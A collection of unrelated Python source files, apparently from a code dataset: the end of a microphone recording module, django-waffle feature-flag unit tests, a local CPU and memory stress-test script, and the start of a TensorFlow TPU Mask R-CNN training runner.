else:
PTLogger.info("File already exists")
else:
PTLogger.info("No recorded audio data found")
else:
PTLogger.info("Microphone is still recording!")
def set_sample_rate_to_16khz():
"""Set the appropriate I2C bits to enable 16,000Hz recording on the
microphone."""
configuration.set_microphone_sample_rate_to_16khz()
def set_sample_rate_to_22khz():
"""Set the appropriate I2C bits to enable 22,050Hz recording on the
microphone."""
configuration.set_microphone_sample_rate_to_22khz()
def set_bit_rate_to_unsigned_8():
"""Set bitrate to device default."""
global _bitrate
_bitrate = 8
def set_bit_rate_to_signed_16():
"""Set bitrate to double that of device default by scaling the signal."""
global _bitrate
_bitrate = 16
#######################
# INITIALISATION #
#######################
_signal = signal.signal(signal.SIGINT, __signal_handler)
|
test_waffle.py
|
import logging
import random
import threading
import unittest
from django.contrib.auth import get_user_model
from django.conf import settings
from django.contrib.auth.models import AnonymousUser, Group
from django.db import connection, transaction
from django.test import RequestFactory, TransactionTestCase
from django.test.utils import override_settings
import mock
import waffle
from test_app import views
from test_app.models import CompanyAwareFlag, Company
from waffle.middleware import WaffleMiddleware
from waffle.models import Sample, Switch
from waffle.tests.base import TestCase
DATABASES = {'default', 'readonly'}
def get(**kw):
request = RequestFactory().get('/foo', data=kw)
request.user = AnonymousUser()
return request
def process_request(request, view):
response = view(request)
return WaffleMiddleware().process_response(request, response)
class WaffleTests(TestCase):
databases = DATABASES
def assert_flag_dynamically_created_with_value(self, expected_value):
FLAG_NAME = 'my_dynamically_created_flag'
flag_model = waffle.get_waffle_flag_model()
assert flag_model.objects.count() == 0
assert expected_value == waffle.flag_is_active(get(), FLAG_NAME)
assert flag_model.objects.count() == 1
flag = flag_model.objects.get(name=FLAG_NAME)
assert flag.name == FLAG_NAME
# We assert no queries are made to ensure flags created when the
# `CREATE_MISSING_FLAGS` setting is active are properly cached.
with self.assertNumQueries(0):
assert expected_value == waffle.flag_is_active(get(), FLAG_NAME)
def test_persist_active_flag(self):
waffle.get_waffle_flag_model().objects.create(name='myflag', percent='0.1')
request = get()
# Flag stays on.
request.COOKIES['dwf_myflag'] = 'True'
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' in response.cookies
self.assertEqual('True', response.cookies['dwf_myflag'].value)
def test_persist_inactive_flag(self):
waffle.get_waffle_flag_model().objects.create(name='myflag', percent='99.9')
request = get()
# Flag stays off.
request.COOKIES['dwf_myflag'] = 'False'
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' in response.cookies
self.assertEqual('False', response.cookies['dwf_myflag'].value)
def test_no_set_unused_flag(self):
"""An unused flag shouldn't have its cookie reset."""
request = get()
request.COOKIES['dwf_unused'] = 'True'
response = process_request(request, views.flag_in_view)
assert 'dwf_unused' not in response.cookies
def test_superuser(self):
"""Test the superuser switch."""
waffle.get_waffle_flag_model().objects.create(name='myflag', superusers=True)
request = get()
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
superuser = get_user_model()(username='foo', is_superuser=True)
request.user = superuser
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
non_superuser = get_user_model()(username='bar', is_superuser=False)
non_superuser.save()
request.user = non_superuser
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
def test_staff(self):
"""Test the staff switch."""
waffle.get_waffle_flag_model().objects.create(name='myflag', staff=True)
request = get()
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
staff = get_user_model()(username='foo', is_staff=True)
request.user = staff
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
non_staff = get_user_model()(username='foo', is_staff=False)
non_staff.save()
request.user = non_staff
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
def test_languages(self):
waffle.get_waffle_flag_model().objects.create(name='myflag', languages='en,fr')
request = get()
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
request.LANGUAGE_CODE = 'en'
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
request.LANGUAGE_CODE = 'de'
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
def test_user(self):
"""Test the per-user switch."""
user = get_user_model().objects.create(username='foo')
flag = waffle.get_waffle_flag_model().objects.create(name='myflag')
flag.users.add(user)
request = get()
request.user = user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
request.user = get_user_model().objects.create(username='someone_else')
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
# Unsetting the flag on a user should have an effect.
flag.users.remove(user)
request.user = user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
def test_remove_from_user(self):
"""Same operation of `test_user` but performed with reverse relation"""
user = get_user_model().objects.create(username='foo')
flag = waffle.get_waffle_flag_model().objects.create(name='myflag')
flag.users.add(user)
request = get()
request.user = user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
request.user = get_user_model().objects.create(username='someone_else')
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
# Unsetting the flag on a user should have an effect.
user.flag_set.remove(flag)
request.user = user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
def test_group(self):
"""Test the per-group switch."""
group = Group.objects.create(name='foo')
user = get_user_model().objects.create(username='bar')
user.groups.add(group)
flag = waffle.get_waffle_flag_model().objects.create(name='myflag')
flag.groups.add(group)
request = get()
request.user = user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
request.user = get_user_model()(username='someone_else')
request.user.save()
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
# Unsetting the flag on a group should have an effect.
flag.groups.remove(group)
request.user = user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
def test_remove_from_group(self):
"""Same operation of `test_group` but performed with reverse relation"""
group = Group.objects.create(name='foo')
user = get_user_model().objects.create(username='bar')
user.groups.add(group)
flag = waffle.get_waffle_flag_model().objects.create(name='myflag')
flag.groups.add(group)
request = get()
request.user = user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
request.user = get_user_model()(username='someone_else')
request.user.save()
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
# Unsetting the flag on a group should have an effect.
group.flag_set.remove(flag)
request.user = user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
def test_authenticated(self):
"""Test the authenticated/anonymous switch."""
waffle.get_waffle_flag_model().objects.create(name='myflag', authenticated=True)
request = get()
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
request.user = get_user_model()(username='foo')
assert request.user.is_authenticated
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
def test_everyone_on(self):
"""Test the 'everyone' switch on."""
waffle.get_waffle_flag_model().objects.create(name='myflag', everyone=True)
request = get()
request.COOKIES['dwf_myflag'] = 'False'
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
request.user = get_user_model()(username='foo')
assert request.user.is_authenticated
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
def test_everyone_off(self):
"""Test the 'everyone' switch off."""
waffle.get_waffle_flag_model().objects.create(name='myflag', everyone=False, authenticated=True)
request = get()
request.COOKIES['dwf_myflag'] = 'True'
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
request.user = get_user_model()(username='foo')
assert request.user.is_authenticated
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
def test_percent(self):
"""If you have no cookie, you get a cookie!"""
waffle.get_waffle_flag_model().objects.create(name='myflag', percent='50.0')
request = get()
response = process_request(request, views.flag_in_view)
assert 'dwf_myflag' in response.cookies
@mock.patch.object(random, 'uniform')
def test_reroll(self, uniform):
"""Even without a cookie, calling flag_is_active twice should return
the same value."""
waffle.get_waffle_flag_model().objects.create(name='myflag', percent='50.0')
# Make sure we're not really random.
request = get() # Create a clean request.
assert not hasattr(request, 'waffles')
uniform.return_value = '10' # < 50. Flag is True.
assert waffle.flag_is_active(request, 'myflag')
assert hasattr(request, 'waffles') # We should record this flag.
assert 'myflag' in request.waffles
assert request.waffles['myflag'][0]
uniform.return_value = '70' # > 50. Normally, Flag would be False.
assert waffle.flag_is_active(request, 'myflag')
assert request.waffles['myflag'][0]
def test_undefined(self):
"""Undefined flags are always false."""
request = get()
assert not waffle.flag_is_active(request, 'foo')
@override_settings(WAFFLE_FLAG_DEFAULT=True)
def test_undefined_default(self):
"""WAFFLE_FLAG_DEFAULT controls undefined flags."""
request = get()
assert waffle.flag_is_active(request, 'foo')
@override_settings(WAFFLE_OVERRIDE=True)
def test_override(self):
request = get(foo='1')
waffle.get_waffle_flag_model().objects.create(name='foo') # Off for everyone.
assert waffle.flag_is_active(request, 'foo')
def test_testing_flag(self):
waffle.get_waffle_flag_model().objects.create(name='foo', testing=True)
request = get(dwft_foo='1')
assert waffle.flag_is_active(request, 'foo')
assert 'foo' in request.waffle_tests
assert request.waffle_tests['foo']
# GET param should override cookie
request = get(dwft_foo='0')
request.COOKIES['dwft_foo'] = 'True'
assert not waffle.flag_is_active(request, 'foo')
assert 'foo' in request.waffle_tests
assert not request.waffle_tests['foo']
def test_testing_disabled_flag(self):
waffle.get_waffle_flag_model().objects.create(name='foo')
request = get(dwft_foo='1')
assert not waffle.flag_is_active(request, 'foo')
assert not hasattr(request, 'waffle_tests')
request = get(dwft_foo='0')
assert not waffle.flag_is_active(request, 'foo')
assert not hasattr(request, 'waffle_tests')
def test_testing_flag_header(self):
waffle.get_waffle_flag_model().objects.create(name='foo', testing=True)
request = RequestFactory().get('/foo', HTTP_DWFT_FOO='1')
request.user = AnonymousUser()
assert waffle.flag_is_active(request, 'foo')
assert 'foo' in request.waffle_tests
assert request.waffle_tests['foo']
# header should override cookie
request = RequestFactory().get('/foo', HTTP_DWFT_FOO='0')
request.user = AnonymousUser()
request.COOKIES['dwft_foo'] = 'True'
assert not waffle.flag_is_active(request, 'foo')
assert 'foo' in request.waffle_tests
assert not request.waffle_tests['foo']
def test_set_then_unset_testing_flag(self):
waffle.get_waffle_flag_model().objects.create(name='myflag', testing=True)
response = self.client.get('/flag_in_view?dwft_myflag=1')
self.assertEqual(b'on', response.content)
response = self.client.get('/flag_in_view')
self.assertEqual(b'on', response.content)
response = self.client.get('/flag_in_view?dwft_myflag=0')
self.assertEqual(b'off', response.content)
response = self.client.get('/flag_in_view')
self.assertEqual(b'off', response.content)
response = self.client.get('/flag_in_view?dwft_myflag=1')
self.assertEqual(b'on', response.content)
@override_settings(DATABASE_ROUTERS=['waffle.tests.base.ReplicationRouter'])
def test_everyone_on_read_from_write_db(self):
flag = waffle.get_waffle_flag_model().objects.create(name='myflag', everyone=True)
request = get()
response = process_request(request, views.flag_in_view)
# By default, flag_is_active should hit whatever it configured as the
# read DB (so values will be stale if replication is lagged).
self.assertEqual(b'off', response.content)
with override_settings(WAFFLE_READ_FROM_WRITE_DB=True):
# Save the flag again to flush the cache.
flag.save()
# The next read should now be directed to the write DB, ensuring
# the cache and DB are in sync.
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
@override_settings(WAFFLE_FLAG_MODEL='test_app.CompanyAwareFlag', AUTH_USER_MODEL='test_app.CompanyUser')
def test_pluggable_model(self):
flag_model = waffle.get_waffle_flag_model()
self.assertEqual(CompanyAwareFlag, flag_model)
acme_company = Company.objects.create(name='Acme Ltd.')
feline_company = Company.objects.create(name='Feline LLC')
acme_company_flag = waffle.get_waffle_flag_model().objects.create(name='myflag', superusers=True)
acme_company_flag.companies.add(acme_company)
request = get()
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
acme_user = get_user_model()(username='acme.mcfield', company=acme_company)
request.user = acme_user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
feline_user = get_user_model()(username='acme.mcfield', company=feline_company)
request.user = feline_user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
@override_settings(WAFFLE_CREATE_MISSING_FLAGS=True)
@override_settings(WAFFLE_FLAG_DEFAULT=False)
def test_flag_created_dynamically_default_false(self):
self.assert_flag_dynamically_created_with_value(False)
@override_settings(WAFFLE_CREATE_MISSING_FLAGS=True)
@override_settings(WAFFLE_FLAG_DEFAULT=True)
def test_flag_created_dynamically_default_true(self):
self.assert_flag_dynamically_created_with_value(True)
@override_settings(WAFFLE_CREATE_MISSING_FLAGS=True)
@override_settings(WAFFLE_FLAG_DEFAULT=True)
def test_flag_created_dynamically_upon_retrieval(self):
FLAG_NAME = 'myflag'
flag_model = waffle.get_waffle_flag_model()
flag = flag_model.get(FLAG_NAME)
assert flag.is_active(get())
assert flag_model.objects.filter(name=FLAG_NAME).exists()
@mock.patch('waffle.models.logger')
def test_no_logging_missing_flag_by_default(self, mock_logger):
request = get()
waffle.flag_is_active(request, 'foo')
mock_logger.log.call_count == 0
@override_settings(WAFFLE_LOG_MISSING_FLAGS=logging.WARNING)
@mock.patch('waffle.models.logger')
def test_logging_missing_flag(self, mock_logger):
request = get()
waffle.flag_is_active(request, 'foo')
mock_logger.log.assert_called_with(logging.WARNING, 'Flag %s not found', 'foo')
class SwitchTests(TestCase):
databases = DATABASES
def assert_switch_dynamically_created_with_value(self, expected_value):
SWITCH_NAME = 'my_dynamically_created_switch'
assert Switch.objects.count() == 0
assert expected_value == waffle.switch_is_active(SWITCH_NAME)
assert Switch.objects.count() == 1
switch = Switch.objects.get(name=SWITCH_NAME)
assert switch.name == SWITCH_NAME
assert expected_value == switch.active
# We assert no queries are made to ensure switches created when the
# `CREATE_MISSING_SWITCHES` setting is active are properly cached.
with self.assertNumQueries(0):
assert expected_value == waffle.switch_is_active(SWITCH_NAME)
def test_switch_active(self):
switch = Switch.objects.create(name='myswitch', active=True)
assert waffle.switch_is_active(switch.name)
def test_switch_inactive(self):
switch = Switch.objects.create(name='myswitch', active=False)
assert not waffle.switch_is_active(switch.name)
def test_switch_active_from_cache(self):
"""Do not make two queries for an existing active switch."""
switch = Switch.objects.create(name='myswitch', active=True)
# Get the value once so that it will be put into the cache
assert waffle.switch_is_active(switch.name)
queries = len(connection.queries)
assert waffle.switch_is_active(switch.name)
self.assertEqual(queries, len(connection.queries))
def test_switch_inactive_from_cache(self):
"""Do not make two queries for an existing inactive switch."""
switch = Switch.objects.create(name='myswitch', active=False)
# Get the value once so that it will be put into the cache
assert not waffle.switch_is_active(switch.name)
queries = len(connection.queries)
assert not waffle.switch_is_active(switch.name)
self.assertEqual(queries, len(connection.queries))
def test_undefined(self):
assert not waffle.switch_is_active('foo')
@override_settings(WAFFLE_SWITCH_DEFAULT=True)
def test_undefined_default(self):
assert waffle.switch_is_active('foo')
@override_settings(DEBUG=True)
def test_no_query(self):
"""Do not make two queries for a non-existent switch."""
assert not Switch.objects.filter(name='foo').exists()
queries = len(connection.queries)
assert not waffle.switch_is_active('foo')
assert len(connection.queries) > queries
queries = len(connection.queries)
assert not waffle.switch_is_active('foo')
self.assertEqual(queries, len(connection.queries))
@override_settings(DATABASE_ROUTERS=['waffle.tests.base.ReplicationRouter'])
def test_read_from_write_db(self):
switch = Switch.objects.create(name='switch', active=True)
# By default, switch_is_active should hit whatever it configured as the
# read DB (so values will be stale if replication is lagged).
assert not waffle.switch_is_active(switch.name)
with override_settings(WAFFLE_READ_FROM_WRITE_DB=True):
# Save the switch again to flush the cache.
switch.save()
# The next read should now be directed to the write DB, ensuring
# the cache and DB are in sync.
assert waffle.switch_is_active(switch.name)
@override_settings(WAFFLE_CREATE_MISSING_SWITCHES=True)
@override_settings(WAFFLE_SWITCH_DEFAULT=False)
def test_switch_created_dynamically_false(self):
self.assert_switch_dynamically_created_with_value(False)
@override_settings(WAFFLE_CREATE_MISSING_SWITCHES=True)
@override_settings(WAFFLE_SWITCH_DEFAULT=True)
def test_switch_created_dynamically_true(self):
self.assert_switch_dynamically_created_with_value(True)
@mock.patch('waffle.models.logger')
def test_no_logging_missing_switch_by_default(self, mock_logger):
waffle.switch_is_active('foo')
mock_logger.log.call_count == 0
@override_settings(WAFFLE_LOG_MISSING_SWITCHES=logging.WARNING)
@mock.patch('waffle.models.logger')
def test_logging_missing_switch(self, mock_logger):
waffle.switch_is_active('foo')
mock_logger.log.assert_called_with(logging.WARNING, 'Switch %s not found', 'foo')
class SampleTests(TestCase):
databases = DATABASES
def assert_sample_dynamically_created_with_value(self, is_active, expected_value):
SAMPLE_NAME = 'my_dynamically_created_sample'
assert Sample.objects.count() == 0
assert is_active == waffle.sample_is_active(SAMPLE_NAME)
assert Sample.objects.count() == 1
sample = Sample.objects.get(name=SAMPLE_NAME)
assert sample.name == SAMPLE_NAME
assert sample.percent == expected_value
# We assert no queries are made to ensure samples created when the
# `CREATE_MISSING_SAMPLES` setting is active are properly cached.
with self.assertNumQueries(0):
assert is_active == waffle.sample_is_active(SAMPLE_NAME)
def test_sample_100(self):
sample = Sample.objects.create(name='sample', percent='100.0')
assert waffle.sample_is_active(sample.name)
def test_sample_0(self):
sample = Sample.objects.create(name='sample', percent='0.0')
assert not waffle.sample_is_active(sample.name)
def test_undefined(self):
assert not waffle.sample_is_active('foo')
@override_settings(WAFFLE_SAMPLE_DEFAULT=True)
def test_undefined_default(self):
assert waffle.sample_is_active('foo')
@override_settings(DATABASE_ROUTERS=['waffle.tests.base.ReplicationRouter'])
def test_read_from_write_db(self):
sample = Sample.objects.create(name='sample', percent='100.0')
# By default, sample_is_active should hit whatever it configured as the
# read DB (so values will be stale if replication is lagged).
assert not waffle.sample_is_active(sample.name)
with override_settings(WAFFLE_READ_FROM_WRITE_DB=True):
# Save the sample again to flush the cache.
sample.save()
# The next read should now be directed to the write DB, ensuring
# the cache and DB are in sync.
assert waffle.sample_is_active(sample.name)
@override_settings(WAFFLE_CREATE_MISSING_SAMPLES=True)
@override_settings(WAFFLE_SAMPLE_DEFAULT=False)
def test_sample_created_dynamically_default_false(self):
self.assert_sample_dynamically_created_with_value(False, 0.0)
@override_settings(WAFFLE_CREATE_MISSING_SAMPLES=True)
@override_settings(WAFFLE_SAMPLE_DEFAULT=True)
def test_sample_created_dynamically_default_true(self):
self.assert_sample_dynamically_created_with_value(True, 100.0)
@mock.patch('waffle.models.logger')
def test_no_logging_missing_sample_by_default(self, mock_logger):
waffle.switch_is_active('foo')
mock_logger.log.call_count == 0
@override_settings(WAFFLE_LOG_MISSING_SAMPLES=logging.WARNING)
@mock.patch('waffle.models.logger')
def test_logging_missing_sample(self, mock_logger):
waffle.sample_is_active('foo')
mock_logger.log.assert_called_with(logging.WARNING, 'Sample %s not found', 'foo')
class TransactionTestMixin(object):
"""Mixin providing an abstract test case for writing in a transaction.
"""
def create_toggle(self):
"""Create an inactive feature toggle (i.e. flag, switch, sample)."""
raise NotImplementedError
def flip_toggle(self, toggle):
"""Flip the toggle to an active state."""
raise NotImplementedError
def toggle_is_active(self, toggle):
"""Use the built-in *_is_active helper to check the toggle's state."""
raise NotImplementedError
@unittest.skipIf('sqlite3' in settings.DATABASES['default']['ENGINE'],
'This test uses threads, which the sqlite3 DB engine '
'does not support.')
def test_flip_toggle_in_transaction(self):
"""Wait to invalidate the cache until after the current transaction.
This test covers a potential race condition where, if the cache were
flushed in the middle of a transaction, the next read from the database
(before the transaction is committed) would get a stale value and cache
it. See #296 for more context.
"""
toggle = self.create_toggle()
self.addCleanup(toggle.delete)
written_in_background_thread = threading.Event()
read_in_main_thread = threading.Event()
@transaction.atomic
def update_toggle():
self.flip_toggle(toggle)
# Signal to the main thread that the toggle has been updated, but
# the transaction is not yet committed.
written_in_background_thread.set()
# Pause here to allow the main thread to make an assertion.
read_in_main_thread.wait(timeout=1)
# Start a background thread to update the toggle in a transaction.
t = threading.Thread(target=update_toggle)
t.daemon = True
t.start()
# After the toggle is updated but before the transaction is committed,
# the cache will still have the previous value.
written_in_background_thread.wait(timeout=1)
assert not self.toggle_is_active(toggle)
# After the transaction is committed, the cache should have been
# invalidated, hence the next call to *_is_active should have the
# correct value.
read_in_main_thread.set()
t.join(timeout=1)
assert self.toggle_is_active(toggle)
class FlagTransactionTests(TransactionTestMixin, TransactionTestCase):
def create_toggle(self):
return waffle.get_waffle_flag_model().objects.create(
name='transaction-flag-name', everyone=False
)
def flip_toggle(self, flag):
flag.everyone = True
flag.save()
def toggle_is_active(self, flag):
return waffle.flag_is_active(get(), flag.name)
class SwitchTransactionTests(TransactionTestMixin, TransactionTestCase):
def create_toggle(self):
return Switch.objects.create(name='transaction-switch-name',
active=False)
def flip_toggle(self, switch):
switch.active = True
switch.save()
def toggle_is_active(self, switch):
return waffle.switch_is_active(switch.name)
class SampleTransactionTests(TransactionTestMixin, TransactionTestCase):
def create_toggle(self):
return Sample.objects.create(name='transaction-sample-name', percent=0)
def flip_toggle(self, sample):
sample.percent = 100
sample.save()
def toggle_is_active(self, sample):
return waffle.sample_is_active(sample.name)
|
stress_test.py
|
from multiprocessing import Process, active_children, Pipe
import os
import signal
import sys
import time
import psutil
DEFAULT_TIME = 60
TOTAL_CPU = psutil.cpu_count(logical=True)
DEFAULT_MEMORY = (psutil.virtual_memory().total >> 20)*1000
PERCENT = 100
GIGA = 2 ** 30
MEGA = 2 ** 20
def loop(conn, affinity, check):
'''
Function to stress cores to run at 100%
Arguments:
conn : child connection which is an object of Pipe()
affinity: list of cores to assign affinity for the process
check : conditional flag to enable real time calibration
'''
proc = psutil.Process()
proc_info = proc.pid
msg = "Process ID: "+str(proc_info)+" CPU: "+str(affinity[0]) #Create a message string of PID and core number
conn.send(msg) #Send message to parent
conn.close()
proc.cpu_affinity(affinity) #Assigns a core to process
while True:
'''
Conditional check for calibration
'''
if(check and psutil.cpu_percent()>PERCENT):
time.sleep(0.05) #Change the time for finetuning
1*1
def last_core_loop(conn, affinity, percent):
'''
Function to stress the last core at fractional percentage.
e.g. core 5 at 45% Usage
Arguments:
conn : child connection which is an object of Pipe()
affinity: list of cores to assign affinity for the process
percent : fractional percentage to run the core at
'''
proc = psutil.Process()
proc_info = proc.pid
msg = "Process ID: "+str(proc_info)+" CPU: "+str(affinity[0]) #Create a message string of PID and core number
conn.send(msg) #Send message to parent
conn.close()
proc.cpu_affinity(affinity) #Assigns a core to process
while True:
'''
Conditional check for core calibration
'''
if(psutil.cpu_percent(percpu=True)[affinity[0]] > percent):
time.sleep(0.1) #Change the time for finetuning
1*1
def sigint_handler(signum, frame):
'''
Function to handle keyboard interrupt
'''
procs = active_children() #Retrieve list of active processes
for p in procs:
p.terminate()
os._exit(1)
signal.signal(signal.SIGINT, sigint_handler)
def get_args():
'''
Function to assign commandline arguments if passed.
Returns:
exec_time : Execution time in seconds, default = 60
proc_num : Number of processors required according
to the percentage input by the user.
Default = total cpu count of the system
memory : Memory in Megabytes to be consumed.
Default = Total system memory
percent : Percentage of CPU to be used
'''
exec_time = DEFAULT_TIME
proc_num = TOTAL_CPU
percent = 100
memory = DEFAULT_MEMORY
if(len(sys.argv) > 4):
raise #If user enters more than 3 arguments
if(len(sys.argv) == 2):
percent = int(sys.argv[1]) #CPU usage
if(percent > 100): #If user enters more than 100% usage
raise
proc_num = (percent * TOTAL_CPU)/100 #Convert CPU usage into number of cores
if(len(sys.argv) == 3):
percent = int(sys.argv[1])
if(percent > 100):
raise
proc_num = (percent * TOTAL_CPU)/100
exec_time = int(sys.argv[2]) #Execution time
if(len(sys.argv) == 4):
percent = int(sys.argv[1])
proc_num = (percent * TOTAL_CPU)/100
exec_time = int(sys.argv[2])
memory = int(sys.argv[3]) #Memory amount
if(percent > 100 or memory > DEFAULT_MEMORY):
raise
return exec_time, proc_num, percent, memory
def pmem():
'''
Function to display memory statistics
'''
tot, avail, percent, used, free = psutil.virtual_memory()
tot, avail, used, free = tot / GIGA, avail / GIGA, used / GIGA, free / GIGA
print("---------------------------------------")
print("Memory Stats: total = %s GB \navail = %s GB \nused = %s GB \nfree = %s GB \npercent = %s"
% (tot, avail, used, free, percent))
def alloc_max_str(memory):
'''
Function to load memory by assigning string of requested size
Arguments:
memory: amount of memory to be utilized in MB
Returns:
a : String of size 'memory'
'''
i = 0
a = ''
while True:
try:
a = ' ' * (i * 256 * MEGA)
if((psutil.virtual_memory().used >> 20) > memory):
break
del a
except MemoryError:
break
i += 1
return a
def memory_stress(memory, exec_time):
'''
Function to stress memory and display memory Stats
Arguments:
memory: amount of memory to be utilized in MB
exec_time: time for which the system is supposed to keep the object
Returns:
a : String of size 'memory'
'''
pmem()
a = alloc_max_str(memory)
pmem()
print("Memory Filled:")
print("Waiting for %d sec"%(exec_time))
return a;
def _main():
'''
Function to stress CPU and Memory
'''
try:
exec_time, proc_num, cpu_percent, memory = get_args()
global PERCENT
PERCENT = cpu_percent
except:
msg = "Usage: stress_test [CPU percent] [exec_time] [Memory in MB]"
sys.stderr.write(msg)
constraints = "\nCPU < 100 and memory < "+str(DEFAULT_MEMORY)
sys.stderr.write(constraints)
sys.exit(1)
procs = []
conns = []
print("CPU and Memory Stress in progress:")
'''
Memory Stress call:
'''
a = memory_stress(memory, exec_time)
'''
CPU Stress logic:
'''
print("Stressing %f cores:"%(proc_num))
actual_cores = int(proc_num)
last_core_usage = round((proc_num-actual_cores),2)*100
proc_num = actual_cores
#Run the required cores at 100% except one
for i in range(proc_num-1):
parent_conn, child_conn = Pipe()
p = Process(target=loop, args=(child_conn,[i], False))
p.start()
procs.append(p)
conns.append(parent_conn)
#Run the last core out of the required cores to balance total output by actively calibrating realtime usage
parent_conn, child_conn = Pipe()
p = Process(target=loop, args=(child_conn,[proc_num-1], True))
p.start()
procs.append(p)
conns.append(parent_conn)
#If CPU usage is not 100%, run the fractional part of the last core
if(proc_num!=TOTAL_CPU):
last_core = proc_num
parent_conn, child_conn = Pipe()
p = Process(target=last_core_loop, args=(child_conn, [last_core], last_core_usage))
p.start()
procs.append(p)
conns.append(parent_conn)
#Print PID and core messages sent by the children
for conn in conns:
try:
print(conn.recv())
except EOFError:
continue
#Carry out the execution for exec_time
time.sleep(exec_time)
#delete memory load
del a
#Terminate child processes
for p in procs:
p.terminate()
if __name__ == "__main__":
_main()
|
train_and_eval_low_level_runner.py
|
# Copyright 2018 Google. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Train_and_eval MaskRcnn with low level API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import threading
import time
import six
import tensorflow as tf
from tensorflow.contrib.tpu.python.tpu import device_assignment as tpu_device_assignment
from tensorflow.contrib.tpu.python.tpu import tpu
from tensorflow.contrib.tpu.python.tpu import tpu_feed
from tensorflow.contrib.tpu.python.tpu import tpu_function
from tensorflow.python.framework import graph_io
import eval_multiprocess
import mask_rcnn_params
import runner_utils
from mlp_log import mlp_log
_INITIAL_LOSS = 1e7
_STOP = -1
_MAX_NUM_CHECKPOINT_THREADS = 1
# for spatial partition
_NUM_CORES_TO_COMPUTATION_SHAPE = {
1: [1, 1, 1],
2: [1, 1, 2],
4: [1, 2, 2],
8: [2, 2, 2],
16: [4, 2, 2],
}
class TrainEvalLowLevelRunner(object):
"""Run Train via direct session.run calls."""
def __init__(self, tpu_cluster_resolver, train_params, eval_params,
eval_steps, eval_metric, input_partition_dims=None,
num_cores_per_replica=None, tpu_job_name=None):
tf.logging.info("TrainLowLevelRunner: constructor")
self.tpu_cluster_resolver = tpu_cluster_resolver
self.eval_metric = eval_metric
self.train_params = train_params
self.eval_params = eval_params
self.train_params["batch_size"] = (
train_params["train_batch_size"] // train_params["num_shards"])
self.eval_params["batch_size"] = (
eval_params["eval_batch_size"] // eval_params["num_shards"])
self.tpu_job_name = tpu_job_name
self.model_dir = train_params["model_dir"]
self.iterations_per_loop = train_params["iterations_per_loop"]
self.eval_steps = eval_steps
self.num_shards = self.train_params["num_shards"]
self.input_flattener = runner_utils.InputsFlattener()
self.eval_input_flattener = runner_utils.InputsFlattener()
self.num_hosts = None
self.train_eval_compile_op = None
self.train_eval_op = None
self.infeed_queue = []
self.eval_infeed_queue = []
self.outfeed_names = []
self.outfeed_tensors = []
self.enqueue_ops = []
self.eval_enqueue_ops = []
self.dequeue_ops = []
self.dataset_initializer = []
self.eval_dataset_initializer = []
self.scaffold_fn = None
# Having two separate sessions and graphs to make the initialization faster.
self.input_sess = None
self.train_eval_sess = None
self.input_graph = tf.Graph()
self.train_eval_graph = tf.Graph()
self.session_config = tf.ConfigProto(
allow_soft_placement=True, isolate_session_state=True,
operation_timeout_in_ms=600 * 60 * 1000) # 10 hours
cluster_spec = self.tpu_cluster_resolver.cluster_spec()
if cluster_spec:
